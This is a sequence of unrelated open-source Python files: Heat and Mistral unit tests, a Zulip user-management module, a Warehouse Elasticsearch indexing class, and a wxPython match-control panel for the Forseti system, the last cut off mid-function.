        filepath = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                                'templates', file_name)
        f = open(filepath)
        t = template_format.parse(f.read())
        f.close()
        return t

    def compare_stacks(self, json_file, yaml_file, parameters):
        t1 = self.load_template(json_file)
        t2 = self.load_template(yaml_file)
        del(t1[u'AWSTemplateFormatVersion'])
        t1[u'HeatTemplateFormatVersion'] = t2[u'HeatTemplateFormatVersion']
        stack1 = utils.parse_stack(t1, parameters)
        stack2 = utils.parse_stack(t2, parameters)

        # compare resources separately so that resolved static data
        # is compared
        t1nr = dict(stack1.t.t)
        del(t1nr['Resources'])

        t2nr = dict(stack2.t.t)
        del(t2nr['Resources'])
        self.assertEqual(t1nr, t2nr)

        self.assertEqual(set(stack1.keys()), set(stack2.keys()))
        for key in stack1:
            self.assertEqual(stack1[key].t, stack2[key].t)

    def test_neutron_resolved(self):
        self.compare_stacks('Neutron.template', 'Neutron.yaml', {})

    def test_wordpress_resolved(self):
        self.compare_stacks('WordPress_Single_Instance.template',
                            'WordPress_Single_Instance.yaml',
                            {'KeyName': 'test'})

# Copyright 2015 - StackStorm, Inc.
#
#    Licensed under the Apache License, Version 2.0 (the "License");
#    you may not use this file except in compliance with the License.
#    You may obtain a copy of the License at
#
#        http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS,
#    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#    See the License for the specific language governing permissions and
#    limitations under the License.

import mock
from oslo_config import cfg
import requests

from mistral.actions import std_actions
from mistral.db.v2 import api as db_api
from mistral.services import workflows as wf_service
from mistral.tests.unit import base as test_base
from mistral.tests.unit.engine import base
from mistral.workflow import states


# Use the set_default method to set value otherwise in certain test cases
# the change in value is not permanent.
cfg.CONF.set_default('auth_enable', False, group='pecan')

ENV = {
    '__actions': {
        'std.http': {
            'auth': 'librarian:password123',
            'timeout': 30,
        }
    }
}

EXPECTED_ENV_AUTH = ('librarian', 'password123')

WORKFLOW1 = """
---
version: "2.0"
wf1:
  type: direct
  tasks:
    task1:
      action: std.http url="https://api.library.org/books"
      publish:
        result: <% $ %>
"""

WORKFLOW2 = """
---
version: "2.0"
wf2:
  type: direct
  tasks:
    task1:
      action: std.http url="https://api.library.org/books" timeout=60
      publish:
        result: <% $ %>
"""

WORKFLOW1_WITH_ITEMS = """
---
version: "2.0"
wf1_with_items:
  type: direct
  input:
    - links
  tasks:
    task1:
      with-items: link in <% $.links %>
      action: std.http url=<% $.link %>
      publish:
        result: <% $ %>
"""

WORKFLOW2_WITH_ITEMS = """
---
version: "2.0"
wf2_with_items:
  type: direct
  input:
    - links
  tasks:
    task1:
      with-items: link in <% $.links %>
      action: std.http url=<% $.link %> timeout=60
      publish:
        result: <% $ %>
"""


class ActionDefaultTest(base.EngineTestCase):

    @mock.patch.object(
        requests, 'request',
        mock.MagicMock(return_value=test_base.FakeHTTPResponse('', 200, 'OK')))
    @mock.patch.object(
        std_actions.HTTPAction, 'is_sync',
        mock.MagicMock(return_value=True))
    def test_action_defaults_from_env(self):
        wf_service.create_workflows(WORKFLOW1)

        wf_ex = self.engine.start_workflow('wf1', env=ENV)

        self.await_workflow_success(wf_ex.id)

        with db_api.transaction():
            wf_ex = db_api.get_workflow_execution(wf_ex.id)

            self.assertEqual(states.SUCCESS, wf_ex.state)
            self._assert_single_item(wf_ex.task_executions, name='task1')

        requests.request.assert_called_with(
            'GET', 'https://api.library.org/books',
            params=None, data=None, headers=None, cookies=None,
            allow_redirects=None, proxies=None, verify=None,
            auth=EXPECTED_ENV_AUTH,
            timeout=ENV['__actions']['std.http']['timeout'])

    @mock.patch.object(
        requests, 'request',
        mock.MagicMock(return_value=test_base.FakeHTTPResponse('', 200, 'OK')))
    @mock.patch.object(
        std_actions.HTTPAction, 'is_sync',
        mock.MagicMock(return_value=True))
    def test_action_defaults_from_env_not_applied(self):
        wf_service.create_workflows(WORKFLOW2)

        wf_ex = self.engine.start_workflow('wf2', env=ENV)

        self.await_workflow_success(wf_ex.id)

        with db_api.transaction():
            wf_ex = db_api.get_workflow_execution(wf_ex.id)

            self.assertEqual(states.SUCCESS, wf_ex.state)
            self._assert_single_item(wf_ex.task_executions, name='task1')

        requests.request.assert_called_with(
            'GET', 'https://api.library.org/books',
            params=None, data=None, headers=None, cookies=None,
            allow_redirects=None, proxies=None, verify=None,
            auth=EXPECTED_ENV_AUTH,
            timeout=60
        )

    @mock.patch.object(
        requests, 'request',
        mock.MagicMock(return_value=test_base.FakeHTTPResponse('', 200, 'OK')))
    @mock.patch.object(
        std_actions.HTTPAction, 'is_sync',
        mock.MagicMock(return_value=True))
    def test_with_items_action_defaults_from_env(self):
        wf_service.create_workflows(WORKFLOW1_WITH_ITEMS)

        wf_input = {
            'links': [
                'https://api.library.org/books',
                'https://api.library.org/authors'
            ]
        }

        wf_ex = self.engine.start_workflow(
            'wf1_with_items',
            wf_input=wf_input,
            env=ENV
        )

        self.await_workflow_success(wf_ex.id)

        with db_api.transaction():
            wf_ex = db_api.get_workflow_execution(wf_ex.id)

            self.assertEqual(states.SUCCESS, wf_ex.state)
            self._assert_single_item(wf_ex.task_executions, name='task1')

            calls = [mock.call('GET', url, params=None, data=None,
                               headers=None, cookies=None,
                               allow_redirects=None, proxies=None,
                               auth=EXPECTED_ENV_AUTH, verify=None,
                               timeout=ENV['__actions']['std.http']['timeout'])
                     for url in wf_input['links']]

        requests.request.assert_has_calls(calls, any_order=True)

    @mock.patch.object(
        requests, 'request',
        mock.MagicMock(return_value=test_base.FakeHTTPResponse('', 200, 'OK')))
    @mock.patch.object(
        std_actions.HTTPAction, 'is_sync',
        mock.MagicMock(return_value=True))
    def test_with_items_action_defaults_from_env_not_applied(self):
        wf_service.create_workflows(WORKFLOW2_WITH_ITEMS)

        wf_input = {
            'links': [
                'https://api.library.org/books',
                'https://api.library.org/authors'
            ]
        }

        wf_ex = self.engine.start_workflow(
            'wf2_with_items',
            wf_input=wf_input,
            env=ENV
        )

        self.await_workflow_success(wf_ex.id)

        with db_api.transaction():
            wf_ex = db_api.get_workflow_execution(wf_ex.id)

            self.assertEqual(states.SUCCESS, wf_ex.state)
            self._assert_single_item(wf_ex.task_executions, name='task1')

        calls = [mock.call('GET', url, params=None, data=None,
                           headers=None, cookies=None,
                           allow_redirects=None, proxies=None,
                           auth=EXPECTED_ENV_AUTH, verify=None,
                           timeout=60)
                 for url in wf_input['links']]

        requests.request.assert_has_calls(calls, any_order=True)

import re
import unicodedata
from collections import defaultdict
from typing import Any, Dict, List, Optional, Sequence, Union

from django.conf import settings
from django.core.exceptions import ValidationError
from django.db.models.query import QuerySet
from django.forms.models import model_to_dict
from django.utils.translation import gettext as _
from typing_extensions import TypedDict
from zulip_bots.custom_exceptions import ConfigValidationError

from zerver.lib.avatar import avatar_url, get_avatar_field
from zerver.lib.cache import (
    bulk_cached_fetch,
    realm_user_dict_fields,
    user_profile_by_id_cache_key,
    user_profile_cache_key_id,
)
from zerver.lib.exceptions import OrganizationAdministratorRequired
from zerver.lib.request import JsonableError
from zerver.lib.timezone import canonicalize_timezone
from zerver.models import (
    CustomProfileField,
    CustomProfileFieldValue,
    Realm,
    Service,
    UserProfile,
    get_realm_user_dicts,
    get_user_profile_by_id_in_realm,
)


def check_full_name(full_name_raw: str) -> str:
    full_name = full_name_raw.strip()
    if len(full_name) > UserProfile.MAX_NAME_LENGTH:
        raise JsonableError(_("Name too long!"))
    if len(full_name) < UserProfile.MIN_NAME_LENGTH:
        raise JsonableError(_("Name too short!"))
    for character in full_name:
        if unicodedata.category(character)[0] == "C" or character in UserProfile.NAME_INVALID_CHARS:
            raise JsonableError(_("Invalid characters in name!"))
    # Names ending with e.g. `|15` could be ambiguous for
    # sloppily-written parsers of our Markdown syntax for mentioning
    # users with ambiguous names, and likely have no real use, so we
    # ban them.
    if re.search(r"\|\d+$", full_name_raw):
        raise JsonableError(_("Invalid format!"))
    return full_name


# NOTE: We don't try to absolutely prevent 2 bots from having the same
# name (e.g. you can get there by reactivating a deactivated bot after
# making a new bot with the same name).  This is just a check designed
# to make it unlikely to happen by accident.
def check_bot_name_available(realm_id: int, full_name: str) -> None:
    dup_exists = UserProfile.objects.filter(
        realm_id=realm_id,
        full_name=full_name.strip(),
        is_active=True,
    ).exists()

    if dup_exists:
        raise JsonableError(_("Name is already in use!"))


def check_short_name(short_name_raw: str) -> str:
    short_name = short_name_raw.strip()
    if len(short_name) == 0:
        raise JsonableError(_("Bad name or username"))
    return short_name


def check_valid_bot_config(bot_type: int, service_name: str, config_data: Dict[str, str]) -> None:
    if bot_type == UserProfile.INCOMING_WEBHOOK_BOT:
        from zerver.lib.integrations import WEBHOOK_INTEGRATIONS

        config_options = None
        for integration in WEBHOOK_INTEGRATIONS:
            if integration.name == service_name:
                # key: validator
                config_options = {c[1]: c[2] for c in integration.config_options}
                break
        if not config_options:
            raise JsonableError(_("Invalid integration '{}'.").format(service_name))

        missing_keys = set(config_options.keys()) - set(config_data.keys())
        if missing_keys:
            raise JsonableError(
                _("Missing configuration parameters: {}").format(
                    missing_keys,
                )
            )

        for key, validator in config_options.items():
            value = config_data[key]
            error = validator(key, value)
            if error:
                raise JsonableError(_("Invalid {} value {} ({})").format(key, value, error))

    elif bot_type == UserProfile.EMBEDDED_BOT:
        try:
            from zerver.lib.bot_lib import get_bot_handler

            bot_handler = get_bot_handler(service_name)
            if hasattr(bot_handler, "validate_config"):
                bot_handler.validate_config(config_data)
        except ConfigValidationError:
            # The exception provides a specific error message, but that
            # message is not tagged translatable, because it is
            # triggered in the external zulip_bots package.
            # TODO: Think of some clever way to provide a more specific
            # error message.
            raise JsonableError(_("Invalid configuration data!"))


# Adds an outgoing webhook or embedded bot service.
def add_service(
    name: str,
    user_profile: UserProfile,
    base_url: Optional[str] = None,
    interface: Optional[int] = None,
    token: Optional[str] = None,
) -> None:
    Service.objects.create(
        name=name, user_profile=user_profile, base_url=base_url, interface=interface, token=token
    )


def check_bot_creation_policy(user_profile: UserProfile, bot_type: int) -> None:
    # Realm administrators can always add bot
    if user_profile.is_realm_admin:
        return

    if user_profile.realm.bot_creation_policy == Realm.BOT_CREATION_EVERYONE:
        return
    if user_profile.realm.bot_creation_policy == Realm.BOT_CREATION_ADMINS_ONLY:
        raise OrganizationAdministratorRequired()
    if (
        user_profile.realm.bot_creation_policy == Realm.BOT_CREATION_LIMIT_GENERIC_BOTS
        and bot_type == UserProfile.DEFAULT_BOT
    ):
        raise OrganizationAdministratorRequired()


def check_valid_bot_type(user_profile: UserProfile, bot_type: int) -> None:
    if bot_type not in user_profile.allowed_bot_types:
        raise JsonableError(_("Invalid bot type"))


def check_valid_interface_type(interface_type: Optional[int]) -> None:
    if interface_type not in Service.ALLOWED_INTERFACE_TYPES:
        raise JsonableError(_("Invalid interface type"))


def is_administrator_role(role: int) -> bool:
    return role in {UserProfile.ROLE_REALM_ADMINISTRATOR, UserProfile.ROLE_REALM_OWNER}


def bulk_get_users(
    emails: List[str], realm: Optional[Realm], base_query: "QuerySet[UserProfile]" = None
) -> Dict[str, UserProfile]:
    if base_query is None:
        assert realm is not None
        query = UserProfile.objects.filter(realm=realm, is_active=True)
        realm_id = realm.id
    else:
        # WARNING: Currently, this code path only really supports one
        # version of `base_query` being used (because otherwise,
        # they'll share the cache, which can screw up the filtering).
        # If you're using this flow, you'll need to re-do any filters
        # in base_query in the code itself; base_query is just a perf
        # optimization.
        query = base_query
        realm_id = 0

    def fetch_users_by_email(emails: List[str]) -> List[UserProfile]:
        # This should be just
        #
        # UserProfile.objects.select_related("realm").filter(email__iexact__in=emails,
        #                                                    realm=realm)
        #
        # But chaining __in and __iexact doesn't work with Django's
        # ORM, so we have the following hack to construct the relevant where clause
        where_clause = "upper(zerver_userprofile.email::text) IN (SELECT upper(email) FROM unnest(%s) AS email)"
        return query.select_related("realm").extra(where=[where_clause], params=(emails,))

    def user_to_email(user_profile: UserProfile) -> str:
        return user_profile.email.lower()

    return bulk_cached_fetch(
        # Use a separate cache key to protect us from conflicts with
        # the get_user cache.
        lambda email: "bulk_get_users:" + user_profile_cache_key_id(email, realm_id),
        fetch_users_by_email,
        [email.lower() for email in emails],
        id_fetcher=user_to_email,
    )


def get_user_id(user: UserProfile) -> int:
    return user.id


def user_ids_to_users(user_ids: Sequence[int], realm: Realm) -> List[UserProfile]:
    # TODO: Consider adding a flag to control whether deactivated
    # users should be included.

    def fetch_users_by_id(user_ids: List[int]) -> List[UserProfile]:
        return list(UserProfile.objects.filter(id__in=user_ids).select_related())

    user_profiles_by_id: Dict[int, UserProfile] = bulk_cached_fetch(
        cache_key_function=user_profile_by_id_cache_key,
        query_function=fetch_users_by_id,
        object_ids=user_ids,
        id_fetcher=get_user_id,
    )

    found_user_ids = user_profiles_by_id.keys()
    missed_user_ids = [user_id for user_id in user_ids if user_id not in found_user_ids]
    if missed_user_ids:
        raise JsonableError(_("Invalid user ID: {}").format(missed_user_ids[0]))

    user_profiles = list(user_profiles_by_id.values())
    for user_profile in user_profiles:
        if user_profile.realm != realm:
            raise JsonableError(_("Invalid user ID: {}").format(user_profile.id))
    return user_profiles


def access_bot_by_id(user_profile: UserProfile, user_id: int) -> UserProfile:
    try:
        target = get_user_profile_by_id_in_realm(user_id, user_profile.realm)
    except UserProfile.DoesNotExist:
        raise JsonableError(_("No such bot"))
    if not target.is_bot:
        raise JsonableError(_("No such bot"))
    if not user_profile.can_admin_user(target):
        raise JsonableError(_("Insufficient permission"))
    return target


def access_user_by_id(
    user_profile: UserProfile,
    target_user_id: int,
    *,
    allow_deactivated: bool = False,
    allow_bots: bool = False,
    for_admin: bool,
) -> UserProfile:
    """Master function for accessing another user by ID in API code;
    verifies the user ID is in the same realm, and if requested checks
    for administrative privileges, with flags for various special
    cases.
    """
    try:
        target = get_user_profile_by_id_in_realm(target_user_id, user_profile.realm)
    except UserProfile.DoesNotExist:
        raise JsonableError(_("No such user"))
    if target.is_bot and not allow_bots:
        raise JsonableError(_("No such user"))
    if not target.is_active and not allow_deactivated:
        raise JsonableError(_("User is deactivated"))
    if not for_admin:
        # Administrative access is not required just to read a user.
        return target
    if not user_profile.can_admin_user(target):
        raise JsonableError(_("Insufficient permission"))
    return target


class Accounts(TypedDict):
    realm_name: str
    realm_id: int
    full_name: str
    avatar: Optional[str]


def get_accounts_for_email(email: str) -> List[Accounts]:
    profiles = (
        UserProfile.objects.select_related("realm")
        .filter(
            delivery_email__iexact=email.strip(),
            is_active=True,
            realm__deactivated=False,
            is_bot=False,
        )
        .order_by("date_joined")
    )
    accounts: List[Accounts] = []
    for profile in profiles:
        accounts.append(
            dict(
                realm_name=profile.realm.name,
                realm_id=profile.realm.id,
                full_name=profile.full_name,
                avatar=avatar_url(profile),
            )
        )
    return accounts


def get_api_key(user_profile: UserProfile) -> str:
    return user_profile.api_key


def get_all_api_keys(user_profile: UserProfile) -> List[str]:
    # Users can only have one API key for now
    return [user_profile.api_key]


def validate_user_custom_profile_field(
    realm_id: int, field: CustomProfileField, value: Union[int, str, List[int]]
) -> Union[int, str, List[int]]:
    validators = CustomProfileField.FIELD_VALIDATORS
    field_type = field.field_type
    var_name = f"{field.name}"
    if field_type in validators:
        validator = validators[field_type]
        return validator(var_name, value)
    elif field_type == CustomProfileField.SELECT:
        choice_field_validator = CustomProfileField.SELECT_FIELD_VALIDATORS[field_type]
        field_data = field.field_data
        # Put an assertion so that mypy doesn't complain.
        assert field_data is not None
        return choice_field_validator(var_name, field_data, value)
    elif field_type == CustomProfileField.USER:
        user_field_validator = CustomProfileField.USER_FIELD_VALIDATORS[field_type]
        return user_field_validator(realm_id, value, False)
    else:
        raise AssertionError("Invalid field type")


def validate_user_custom_profile_data(
    realm_id: int, profile_data: List[Dict[str, Union[int, str, List[int]]]]
) -> None:
    # This function validate all custom field values according to their field type.
    for item in profile_data:
        field_id = item["id"]
        try:
            field = CustomProfileField.objects.get(id=field_id)
        except CustomProfileField.DoesNotExist:
            raise JsonableError(_("Field id {id} not found.").format(id=field_id))

        try:
            validate_user_custom_profile_field(realm_id, field, item["value"])
        except ValidationError as error:
            raise JsonableError(error.message)


def can_access_delivery_email(user_profile: UserProfile) -> bool:
    realm = user_profile.realm
    if realm.email_address_visibility == Realm.EMAIL_ADDRESS_VISIBILITY_ADMINS:
        return user_profile.is_realm_admin

    if realm.email_address_visibility == Realm.EMAIL_ADDRESS_VISIBILITY_MODERATORS:
        return user_profile.is_realm_admin or user_profile.is_moderator

    return False


def format_user_row(
    realm: Realm,
    acting_user: Optional[UserProfile],
    row: Dict[str, Any],
    client_gravatar: bool,
    user_avatar_url_field_optional: bool,
    custom_profile_field_data: Optional[Dict[str, Any]] = None,
) -> Dict[str, Any]:
    """Formats a user row returned by a database fetch using
    .values(*realm_user_dict_fields) into a dictionary representation
    of that user for API delivery to clients.  The acting_user
    argument is used for permissions checks.
    """

    is_admin = is_administrator_role(row["role"])
    is_owner = row["role"] == UserProfile.ROLE_REALM_OWNER
    is_guest = row["role"] == UserProfile.ROLE_GUEST
    is_bot = row["is_bot"]
    result = dict(
        email=row["email"],
        user_id=row["id"],
        avatar_version=row["avatar_version"],
        is_admin=is_admin,
        is_owner=is_owner,
        is_guest=is_guest,
        is_billing_admin=row["is_billing_admin"],
        role=row["role"],
        is_bot=is_bot,
        full_name=row["full_name"],
        timezone=canonicalize_timezone(row["timezone"]),
        is_active=row["is_active"],
        date_joined=row["date_joined"].isoformat(),
    )

    # Zulip clients that support using `GET /avatar/{user_id}` as a
    # fallback if we didn't send an avatar URL in the user object pass
    # user_avatar_url_field_optional in client_capabilities.
    #
    # This is a major network performance optimization for
    # organizations with 10,000s of users where we would otherwise
    # send avatar URLs in the payload (either because most users have
    # uploaded avatars or because EMAIL_ADDRESS_VISIBILITY_ADMINS
    # prevents the older client_gravatar optimization from helping).
    # The performance impact is large largely because the hashes in
    # avatar URLs structurally cannot compress well.
    #
    # The user_avatar_url_field_optional gives the server sole
    # discretion in deciding for which users we want to send the
    # avatar URL (Which saves clients an RTT at the cost of some
    # bandwidth).  At present, the server looks at `long_term_idle` to
    # decide which users to include avatars for, piggy-backing on a
    # different optimization for organizations with 10,000s of users.
    include_avatar_url = not user_avatar_url_field_optional or not row["long_term_idle"]
    if include_avatar_url:
        result["avatar_url"] = get_avatar_field(
            user_id=row["id"],
            realm_id=realm.id,
            email=row["delivery_email"],
            avatar_source=row["avatar_source"],
            avatar_version=row["avatar_version"],
            medium=False,
            client_gravatar=client_gravatar,
        )

    if acting_user is not None and can_access_delivery_email(acting_user):
        result["delivery_email"] = row["delivery_email"]

    if is_bot:
        result["bot_type"] = row["bot_type"]
        if row["email"] in settings.CROSS_REALM_BOT_EMAILS:
            result["is_cross_realm_bot"] = True

        # Note that bot_owner_id can be None with legacy data.
        result["bot_owner_id"] = row["bot_owner_id"]
    elif custom_profile_field_data is not None:
        result["profile_data"] = custom_profile_field_data
    return result


def user_profile_to_user_row(user_profile: UserProfile) -> Dict[str, Any]:
    # What we're trying to do is simulate the user_profile having been
    # fetched from a QuerySet using `.values(*realm_user_dict_fields)`
    # even though we fetched UserProfile objects.  This is messier
    # than it seems.
    #
    # What we'd like to do is just call model_to_dict(user,
    # fields=realm_user_dict_fields).  The problem with this is
    # that model_to_dict has a different convention than
    # `.values()` in its handling of foreign keys, naming them as
    # e.g. `bot_owner`, not `bot_owner_id`; we work around that
    # here.
    #
    # This could be potentially simplified in the future by
    # changing realm_user_dict_fields to name the bot owner with
    # the less readable `bot_owner` (instead of `bot_owner_id`).
    user_row = model_to_dict(user_profile, fields=[*realm_user_dict_fields, "bot_owner"])
    user_row["bot_owner_id"] = user_row["bot_owner"]
    del user_row["bot_owner"]
    return user_row


def get_cross_realm_dicts() -> List[Dict[str, Any]]:
    users = bulk_get_users(
        list(settings.CROSS_REALM_BOT_EMAILS),
        None,
        base_query=UserProfile.objects.filter(realm__string_id=settings.SYSTEM_BOT_REALM),
    ).values()
    result = []
    for user in users:
        # Important: We filter here, is addition to in
        # `base_query`, because of how bulk_get_users shares its
        # cache with other UserProfile caches.
        if user.realm.string_id != settings.SYSTEM_BOT_REALM:  # nocoverage
            continue
        user_row = user_profile_to_user_row(user)
        # Because we want to avoid clients becing exposed to the
        # implementation detail that these bots are self-owned, we
        # just set bot_owner_id=None.
        user_row["bot_owner_id"] = None

        result.append(
            format_user_row(
                user.realm,
                acting_user=user,
                row=user_row,
                client_gravatar=False,
                user_avatar_url_field_optional=False,
                custom_profile_field_data=None,
            )
        )

    return result


def get_custom_profile_field_values(
    custom_profile_field_values: List[CustomProfileFieldValue],
) -> Dict[int, Dict[str, Any]]:
    profiles_by_user_id: Dict[int, Dict[str, Any]] = defaultdict(dict)
    for profile_field in custom_profile_field_values:
        user_id = profile_field.user_profile_id
        if profile_field.field.is_renderable():
            profiles_by_user_id[user_id][str(profile_field.field_id)] = {
                "value": profile_field.value,
                "rendered_value": profile_field.rendered_value,
            }
        else:
            profiles_by_user_id[user_id][str(profile_field.field_id)] = {
                "value": profile_field.value,
            }
    return profiles_by_user_id


def get_raw_user_data(
    realm: Realm,
    acting_user: Optional[UserProfile],
    *,
    target_user: Optional[UserProfile] = None,
    client_gravatar: bool,
    user_avatar_url_field_optional: bool,
    include_custom_profile_fields: bool = True,
) -> Dict[int, Dict[str, str]]:
    """Fetches data about the target user(s) appropriate for sending to
    acting_user via the standard format for the Zulip API.  If
    target_user is None, we fetch all users in the realm.
    """
    profiles_by_user_id = None
    custom_profile_field_data = None
    # target_user is an optional parameter which is passed when user data of a specific user
    # is required. It is 'None' otherwise.
    if target_user is not None:
        user_dicts = [user_profile_to_user_row(target_user)]
    else:
        user_dicts = get_realm_user_dicts(realm.id)

    if include_custom_profile_fields:
        base_query = CustomProfileFieldValue.objects.select_related("field")
        # TODO: Consider optimizing this query away with caching.
        if target_user is not None:
            custom_profile_field_values = base_query.filter(user_profile=target_user)
        else:
            custom_profile_field_values = base_query.filter(field__realm_id=realm.id)
        profiles_by_user_id = get_custom_profile_field_values(custom_profile_field_values)

    result = {}
    for row in user_dicts:
        if profiles_by_user_id is not None:
            custom_profile_field_data = profiles_by_user_id.get(row["id"], {})

        result[row["id"]] = format_user_row(
            realm,
            acting_user=acting_user,
            row=row,
            client_gravatar=client_gravatar,
            user_avatar_url_field_optional=user_avatar_url_field_optional,
            custom_profile_field_data=custom_profile_field_data,
        )
    return result

# Copyright 2013 Donald Stufft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
from __future__ import unicode_literals

import hashlib
import os

from elasticsearch import Elasticsearch, TransportError
from elasticsearch.helpers import bulk_index

from warehouse.utils import AttributeDict


class Index(object):

    _index = "warehouse"

    def __init__(self, models, config):
        self.models = models
        self.config = config
        self.es = Elasticsearch(
            hosts=self.config.hosts,
            **self.config.get("client_options", {})
        )

        self.types = AttributeDict()

    def register(self, type_):
        obj = type_(self)
        self.types[obj._type] = obj

    def reindex(self, index=None, alias=True, keep_old=False):
        # Generate an Index Name for Warehouse
        index = "".join([
            index if index is not None else self._index,
            hashlib.md5(os.urandom(16)).hexdigest()[:8],
        ])

        # Create this index
        self.es.indices.create(index, {
            "mappings": {
                doc_type._type: doc_type.get_mapping()
                for doc_type in self.types.values()
            },
        })

        # Index everything into the new index
        for doc_type in self.types.values():
            doc_type.index_all(index=index)

        # Update the alias unless we've been told not to
        if alias:
            self.update_alias(self._index, index, keep_old=keep_old)

    def update_alias(self, alias, index, keep_old=False):
        # Get the old index from ElasticSearch
        try:
            old_index = self.es.indices.get_alias(self._index).keys()[0]
        except TransportError as exc:
            if not exc.status_code == 404:
                raise
            old_index = None

        # Remove the alias to the old index if it exists
        if old_index is not None:
            actions = [{"remove": {"index": old_index, "alias": alias}}]
        else:
            actions = []

        # Add the alias to the new index
        actions += [{"add": {"index": index, "alias": alias}}]

        # Update To the New Index
        self.es.indices.update_aliases({"actions": actions})

        # Delete the old index if it exists and unless we're keeping it
        if not keep_old and old_index is not None:
            self.es.indices.delete(old_index)


class BaseMapping(object):

    SEARCH_LIMIT = 25

    def __init__(self, index):
        self.index = index

    def get_mapping(self):
        raise NotImplementedError

    def get_indexable(self):
        raise NotImplementedError

    def extract_id(self, item):
        raise NotImplementedError

    def extract_document(self, item):
        raise NotImplementedError

    def index_all(self, index=None):
        # Determine which index we are indexing into
        _index = index if index is not None else self.index._index

        # Bulk Index our documents
        bulk_index(
            self.index.es,
            [
                {
                    "_index": _index,
                    "_type": self._type,
                    "_id": self.extract_id(item),
                    "_source": self.extract_document(item),
                }
                for item in self.get_indexable()
            ],
        )

    def search(self, query):
        raise NotImplementedError

#!/usr/bin/python2.7
from __future__ import print_function
# -*- coding: utf-8 -*-

import wx
import threading
import lcm
import random
import Forseti
import configurator

BLUE = (24, 25, 141)
GOLD = (241, 169, 50)

class TeamPanel(wx.Panel):

    def __init__(self, remote, letter, number, name, colour, *args, **kwargs):
        super(TeamPanel, self).__init__(*args, **kwargs) 
        self.remote = remote
        self.InitUI(letter, number, name, colour)

    def InitUI(self, letter, number, name, colour=None):
        if colour is not None:
            self.SetBackgroundColour(colour)


        dc = wx.ScreenDC()
        self.num_ctrl = wx.TextCtrl(self, size=(dc.GetCharWidth() * 2, dc.GetCharHeight()))
        self.num_ctrl.AppendText(str(number))
        self.get_button = wx.Button(self, label='Get', size=(dc.GetCharWidth() * 2, dc.GetCharHeight()))
        self.get_button.Bind(wx.EVT_BUTTON, self.do_get_name)
        self.name_ctrl = wx.TextCtrl(self, size=(dc.GetCharWidth() * 16,
            dc.GetCharHeight()))
        self.name_ctrl.AppendText(name)

        name_num_box = wx.BoxSizer(wx.HORIZONTAL)
        name_num_box.Add(wx.StaticText(self, label=letter,
            size=(dc.GetCharWidth() * 0.6, dc.GetCharHeight())))
        name_num_box.Add(self.num_ctrl)
        name_num_box.Add(self.get_button)
        name_num_box.Add(self.name_ctrl)

        #button_box = wx.BoxSizer(wx.HORIZONTAL)
        #button_box.Add(wx.Button(self, label='Reset'))
        #button_box.Add(wx.Button(self, label='Configure'))
        #button_box.Add(wx.Button(self, label='Disable'))

        self.vbox = wx.BoxSizer(wx.VERTICAL)
        self.vbox.Add(name_num_box, flag=wx.CENTER)
        #vbox.Add(button_box, flag=wx.CENTER)

        self.SetSizer(self.vbox)
        self.Show(True)

    def do_get_name(self, event):
        self.name = configurator.get_team_name(self.number)

    @property
    def name(self):
        return self.name_ctrl.GetValue()

    @name.setter
    def name(self, val):
        self.name_ctrl.SetValue(val)

    @property
    def number(self):
        try:
            return int(self.num_ctrl.GetValue())
        except ValueError:
            return 0

    @number.setter
    def number(self, val):
        self.num_ctrl.SetValue(str(val))

class MatchControl(wx.Panel):

    def __init__(self, remote, *args, **kwargs):
        super(MatchControl, self).__init__(*args, **kwargs) 
        self.remote = remote
        self.InitUI()

    def InitUI(self):
        vbox = wx.BoxSizer(wx.VERTICAL)

        dc = wx.ScreenDC()
        match_number = wx.BoxSizer(wx.HORIZONTAL)
        match_number.Add(wx.StaticText(self, label='Match #'.format(1)))
        self.match_num_ctrl = wx.TextCtrl(self, size=(dc.GetCharWidth() * 2,
            dc.GetCharHeight()))
        match_number.Add(self.match_num_ctrl)
        vbox.Add(match_number, flag=wx.CENTER)

        teamSizer = wx.GridSizer(3, 2)
        self.team_panels = [
            TeamPanel(self.remote, 'A', 0, 'Unknown Team', BLUE, self),
            TeamPanel(self.remote, 'C', 0, 'Unknown Team', GOLD, self),
            TeamPanel(self.remote, 'B', 0, 'Unknown Team', BLUE, self),
            TeamPanel(self.remote, 'D', 0, 'Unknown Team', GOLD, self),
            ]
        teamSizer.AddMany(
                [wx.StaticText(self, label='Blue Team'),
                 wx.StaticText(self, label='Gold Team')] +
                [(panel, 0) for panel in self.team_panels])
        vbox.Add(teamSizer, flag=wx.CENTER)

        buttons = wx.BoxSizer(wx.HORIZONTAL)
        self.init_button = wx.Button(self, label='Init')
        self.init_button.Bind(wx.EVT_BUTTON, self.do_init)
        self.go_button = wx.Button(self, label='GO!')
        self.go_button.Bind(wx.EVT_BUTTON, self.do_go)
        self.pause_button = wx.Button(self, label='Pause')
        self.pause_button.Bind(wx.EVT_BUTTON, self.do_pause)
        #self.save_button = wx.Button(self, label='Save')
        #self.save_button.Bind(wx.EVT_BUTTON, self.do_save)
        self.time_text = wx.StaticText(self, label='0:00')
        self.stage_text = wx.StaticText(self, label='Unknown')
        self.remote.time_text = self.time_text
        #buttons.Add(self.save_button, flag=wx.LEFT)
        buttons.Add(self.init_button)
        buttons.Add(self.go_button)
        buttons.Add(self.pause_button)
        buttons.Add(self.time_text)
        buttons.Add(self.stage_text)
        vbox.Add(buttons, flag=wx.CENTER)

        self.SetSizer(vbox)
        self.Show(True)

    def do_go(self, e):
        self.remote.do_go()

    def do_pause(self, e):
        self.remote.do_pause()

    def do_save(self, e):
        self.remote.do_save(self.get_match())

    def do_init(self, e):
        self.remote.do_init(self.get_match())

    def _set_match_panel(self, match, team_idx, panel_idx):
        match.team_numbers[team_idx] = self.team_panels[panel_idx].number
        match.team_names[team_idx] = self.team_panels[panel_idx].name

    def _set_panel_match(self, match, team_idx, panel_idx):
        self.team_panels[panel_idx].number = match.team_numbers[team_idx] 
        self.team_panels[panel_idx].name = match.team_names[team_idx] 

    def get_match(self):
        match = Forseti.Match()
